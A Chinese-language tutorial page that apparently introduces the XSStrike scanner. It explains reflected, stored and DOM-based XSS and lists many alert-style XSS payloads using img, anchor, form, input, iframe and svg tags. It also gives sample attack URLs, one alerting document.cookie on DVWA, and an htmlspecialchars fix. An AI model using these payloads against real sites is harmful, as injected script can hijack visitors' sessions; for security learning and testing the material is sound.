当前位置: 首页 > news >正文

XSS 之XSStrike检测工具

XSS-跨站脚本攻击,依靠一切可能的手段,将浏览器中可以执行的JS代码植入到Web界面中去,从而对客户产生攻击,该漏洞经常出现在需要用户输入的地方,这些地方一旦对输入的内容不进行处理,攻击者就可以进行HTML注入,进而篡改网页。

反射型XSS: 非持久化,一般需要用户手动点进去攻击者伪造好的连接才能触发代码。

存储型XSS:持久性,攻击者的XSS语句存储在服务数据库,当有受害者访问这个网页都会触发代码,一般在留言板,评论区页面经常出现。

DOM型XSS:DOM型xss与上面两种最大的区别就是,dom型xss漏洞是基于文档对象模型(Document Objeet Model,DOM)的,它不需要经过后端,它是在浏览器解析渲染服务器源码的时候产生的,所以我们在抓包的过程中是看不到dom型xss有关的内容的。

一、下载安装

通过网盘分享的文件:XSStrike-master.zip
链接: https://pan.baidu.com/s/11wM2ONtO2FTyenI2eIvo-A 提取码: n6hx

二、相关参数

image

三、常用payload

<?php
echo "<script>alert(1)</script>";
?>
<img src=javascript:alert("xss")>
<IMG SRC=javascript:alert(String.formCharCode(88,83,83))>
<img scr="URL" style='Xss:expression(alert(xss));'>
<img src="x" onerror=alert(1)>
<img src="x" onerror=eval("alert('xss')")>
<img src=x onmouseover=alert('xss')>
<img STYLE="background-image:url(javascript:alert('XSS'))">
XSS利用方式1
<a href="javascript:alert('xss')">aa</a><a href=javascript:eval(alert('xss'))>aa</a><a href="javascript:aaa" onmouseover="alert(/xss/)">aa</a>XSS利用方式2
<script>alert('xss')</script><a href="" onclick=alert('xss')>aa</a>
XSS利用方式3
<a href="" onclick=eval(alert('xss'))>aa</a>
XSS利用方式4
<a href=kycg.asp?ttt=1000 onmouseover=prompt('xss') y=2016>aa</a>
XSS利用方式1
<form action=javascript:alert('xss') method="get">
<form action=javascript:alert('xss')>
XSS利用方式2
<form method=post action=aa.asp? onmouseover=prompt('xss')>
<form method=post action=aa.asp? onmouseover=alert('xss')>
<form action=1 onmouseover=alert('xss')>
利用方式1
<input value="" onclick=alert('xss') type="text">
利用方式2
<input name="name" value="" onmouseover=prompt('xss') bad="">
利用方式4
<input name="name" value=""><script>alert('xss')</script>
XSS利用方式1
<iframe src=javascript:alert('xss');height=5width=1000 /><iframe>
XSS利用方式2
<iframe src="data:text/html,&lt;script&gt;alert('xss')&lt;/script&gt;"></iframe>
<!--原code--><iframe src="data:text/html;base64,<script>alert('xss')</script>"><!--base64编码--><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
XSS利用方式3
<iframe src="aaa" οnmοuseοver=alert('xss') /><iframe>
XSS利用方式3
<iframe src="javascript&colon;prompt&lpar;`xss`&rpar;"></iframe>
<svg onload=alert(1)>

其他

四、简单示例

1、反射型

http://localhost/test/test.php?name=<script>alert(123)</script>

image

解决

<?php
$xss = $_GET['name'];
echo htmlspecialchars($xss);

image

2、存储型

image

python xsstrike.py --url="http://localhost/test/test-1.php" --data="msg=123"

image

 

3、dom型

http://localhost/DVWA-master/vulnerabilities/xss_d/?default=Spanish<script>alert(document.cookie)</script>

image

image

 

http://www.sczhlp.com/news/1805/

相关文章:

  • P8773 选数异或(异或运算+st表)
  • 博客园题头图
  • DDD架构
  • 2025.7.29学习日记【月底效率过低,内容待完善】
  • 深入剖析 Java CPU 飙高问题:从诊断到优化的实战指南
  • 深度理解Java垃圾回收机制:从原理到实践
  • 【16位RAW图像处理五】任意位深16位图像的中值模糊快速实现及其应用。
  • 节点1: modbus通信,作为ros2 service服务器, 节点2: 作为ros2 service服务器,状态话题发布,命令话题订阅, 节点3: 状态话题订阅,命令话题发布
  • 地址匹配地级市
  • 全方位深度剖析,2025 企业AI招聘系统如何选型
  • PostgreSQL技术大讲堂 - 第99讲:冻结TXID深度再揭秘
  • IT服务台深陷手动操作泥潭?ManageEngine卓豪自动化功能释放管理员时间
  • Kotlin
  • 修改 Nginx 启动用户
  • 在Vue中使用插件的步骤
  • WSDF5316锂保
  • 初高中数学衔接教程| 2 因式分解 | 准高一使用
  • CF1338D Nested Rubber Bands
  • 分享一款实用小工具,可一键生成高颜值代码图片
  • 京东快递和顺丰快递主要有以下区别
  • 命令执行漏洞
  • 奔驰轿车各型号定位
  • 5.7.2 功能单元的性能
  • 零宽度字符串
  • 【LeetCode 148】算法进阶:排序链表 ( 归并排序、快速排序、计数排序 )
  • 传统图像处理之皮肤区域检测
  • Typora的卸载以及安装,一键激活
  • OpenCV皮肤检测技术对比与总结
  • 人像美白的python实现
  • DP7361国产音频DA转换芯片支持192K六通道24 位DA转换器 - 动能世纪